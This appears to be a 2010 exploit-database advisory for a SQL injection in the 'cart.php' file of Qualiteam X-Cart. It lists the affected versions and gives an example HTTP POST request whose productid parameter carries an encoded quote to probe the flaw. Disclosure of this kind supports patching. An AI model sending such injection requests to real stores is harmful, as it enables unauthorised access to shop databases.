Qualiteam X-Cart 'cart.php' SQL Injection Vulnerab
Posted on 16 March 2010
======================================================= Qualiteam X-Cart 'cart.php' SQL Injection Vulnerability ======================================================= Vulnerable: Qualiteam X-Cart 4.0.17 Qualiteam X-Cart 4.0.13 Qualiteam X-Cart 4.0.8 Qualiteam X-Cart 3.5.4 Qualiteam X-Cart 3.5.2 Qualiteam X-Cart 3.5.1 Qualiteam X-Cart 3.5 .0 Qualiteam X-Cart 3.4.12 Qualiteam X-Cart 3.4.11 Qualiteam X-Cart 3.4.3 Qualiteam X-Cart 3.4 .0 Qualiteam X-Cart 3.3.2 Qualiteam X-Cart 3.3 .0 Qualiteam X-Cart 3.2.1 Qualiteam X-Cart 3.2 .0 Not Vulnerable: Qualiteam X-Cart 4.0.18 The following example request is available: POST /cart.php?mode=add HTTP/1.1 Host: www.example.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://www.example.com/product.php?productid=16&cat=0&bestseller Cookie: store_language=US; xid=51cac653f7b0dfc3002888369aa343f9 Content-Type: application/x-www-form-urlencoded Content-Length: 206 product_options%5B142%5D=302&product_options%5B180%5D=353&amount=1&mode=add&productid=16%27&cat=0&page= # ~ - [ [ : Inj3ct0r : ] ]